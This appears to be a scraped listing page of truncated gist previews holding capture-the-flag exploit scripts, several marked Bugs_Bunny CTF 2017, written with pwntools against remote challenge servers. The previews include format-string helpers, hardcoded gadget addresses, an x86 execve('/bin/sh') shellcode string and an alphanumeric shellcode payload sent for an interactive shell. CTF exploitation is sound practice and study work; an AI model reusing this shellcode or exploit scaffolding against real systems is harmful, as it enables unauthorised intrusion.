This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| #r = process("./mary_morton") | |
| r = remote('146.185.132.36',19153) | |
| def fmtstr(pld): | |
| r.recvuntil('Exit') | |
| r.sendline("2") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #r = process("./pwn150") | |
| getflag = 0x000104d8 | |
| r = remote("165.227.98.55",2223) | |
| def exploit(pld): | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| r = process("./xkcd") | |
| #raw_input("attach$ ") | |
| def key(value,size): | |
| sen = "SERVER, ARE YOU STILL THERE? IF SO, REPLY \"{}\" ({} LETTERS)".format(value,size) | |
| return sen |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #r = process("./pwn200") | |
| r = remote("54.153.19.139",5254) | |
| #raw_input() | |
| SC ="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import* | |
| io = process("./pwn300") | |
| io = remote("54.153.19.139",5256) | |
| io.sendline("Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M15103e0y4s3c1n0x0H8K2D1K3L7N2l0Y2v7O0g0K2C0e2l5L0w2w14164x0z1m3r0V070v") | |
| io.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Bugs_Bunny CTF 2107 | |
| import libnum | |
| r = open("enc.txt","rb") | |
| f = r.read().split('\n') | |
| flag = "" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Bugs_Bunny CTF 2017 | |
| from pwn import * | |
| #r = process("./pwn150") | |
| #raw_input() | |
| r =remote("54.153.19.139",5253) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Bugs_Bunny CTF 2017 | |
| from pwn import * | |
| r = remote("54.153.19.139",5252) | |
| ret = 0x804b028 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| from littlepwny import * | |
| #con = remote(sys.argv[1],int(sys.argv[2])) | |
| con = process("./START") | |
| shellcode = Scode("x64") | |
| readplt = 0x0000000000400400 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # 72: 0804857b 128 FUNC GLOBAL DEFAULT 13 print_flag | |
| from pwn import * | |
| import sys | |
| #con = process("./overflow") | |
| con = remote(sys.argv[1],sys.argv[2]) |